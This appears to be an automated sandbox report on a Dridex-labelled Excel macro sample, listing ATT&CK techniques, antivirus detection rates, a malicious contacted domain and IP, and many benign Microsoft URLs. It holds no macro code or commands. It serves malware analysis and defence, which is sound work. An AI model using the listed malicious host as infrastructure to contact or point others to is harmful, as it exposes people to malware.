Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12DLL Side-Loading1Process Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting12Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)DLL Side-Loading1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Dridex-06-bc1b.xlsm51%VirustotalBrowse
Dridex-06-bc1b.xlsm5%MetadefenderBrowse
Dridex-06-bc1b.xlsm59%ReversingLabsDocument-Word.Trojan.Ursnif
Dridex-06-bc1b.xlsm100%AviraW2000M/Agent.1970033

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
compagniamaestro.com13%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%VirustotalBrowse
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%VirustotalBrowse
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://api.cortana.ai0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
compagniamaestro.com
199.192.21.36
truetrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
https://api.diagnosticssdf.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
    high
    https://login.microsoftonline.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
      high
      https://shell.suite.office.com:14433BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
        high
        https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
          high
          https://autodiscover-s.outlook.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
              high
              https://cdn.entity.3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                high
                https://wus2-000.contentsync.3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                    high
                    https://powerlift.acompli.net3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v13BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                      high
                      https://cortana.ai3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                high
                                https://api.aadrm.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                • 0%, Virustotal, Browse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                      high
                                      https://cr.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                            high
                                            https://graph.ppe.windows.net3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                            high
                                                            https://graph.windows.net3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.json3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspx3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                    high
                                                                                    https://management.azure.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                      high
                                                                                      https://incidents.diagnostics.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                        high
                                                                                        https://clients.config.office.net/user/v1.0/ios3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                          high
                                                                                          https://insertmedia.bing.office.net/odc/insertmedia3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                            high
                                                                                            https://o365auditrealtimeingestion.manage.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                              high
                                                                                              https://outlook.office365.com/api/v1.0/me/Activities3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                high
                                                                                                https://api.office.net3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                  high
                                                                                                  https://incidents.diagnosticssdf.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                    high
                                                                                                    https://asgsmsproxyapi.azurewebsites.net/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                      high
                                                                                                      https://entitlement.diagnostics.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                        high
                                                                                                        https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                            high
                                                                                                            https://storage.live.com/clientlogs/uploadlocation3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                              high
                                                                                                              https://templatelogging.office.com/client/log3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                high
                                                                                                                https://outlook.office365.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                  high
                                                                                                                  https://webshell.suite.office.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                    high
                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                      high
                                                                                                                      https://management.azure.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                        high
                                                                                                                        https://ncus-000.contentsync.3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorize3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                          high
                                                                                                                          https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://graph.windows.net/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                            high
                                                                                                                            https://api.powerbi.com/beta/myorg/imports3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                              high
                                                                                                                              https://devnull.onenote.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                high
                                                                                                                                https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://messaging.office.com/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://contentstorage.omex.office.net/addinclassifier/officeentities3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://augloop.office.com/v23BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://skyapi.live.net/Activity/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://clients.config.office.net/user/v1.0/mac3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://dataservice.o365filtering.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown
                                                                                                                                                  https://login.windows-ppe.net/common/oauth2/authorize3BA17549-6936-488A-A3B4-7EF0154B3CE5.0.drfalse
                                                                                                                                                    high

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    199.192.21.36
                                                                                                                                                    unknownUnited States
                                                                                                                                                    22612NAMECHEAP-NETUStrue

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                    Analysis ID:344478
                                                                                                                                                    Start date:26.01.2021
                                                                                                                                                    Start time:16:21:58
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 52s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Sample file name:Dridex-06-bc1b.xlsm
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:23
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • GSI enabled (VBA)
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal80.expl.winXLSM@3/9@1/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xlsm
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.147.198.201, 13.88.21.125, 52.109.32.63, 52.109.12.21, 52.109.12.22, 95.101.184.67, 51.104.144.132, 20.54.26.129, 23.55.110.198, 23.55.110.183, 51.103.5.159, 95.101.22.224, 95.101.22.216
                                                                                                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wns.notify.windows.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, par02p.wns.notify.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                    199.192.21.36Dridex-06-bc1b.xlsmGet hashmaliciousBrowse
                                                                                                                                                      n830467925857.xlsmGet hashmaliciousBrowse
                                                                                                                                                        n830467925857.xlsmGet hashmaliciousBrowse
                                                                                                                                                          Fattura_25785.xlsmGet hashmaliciousBrowse
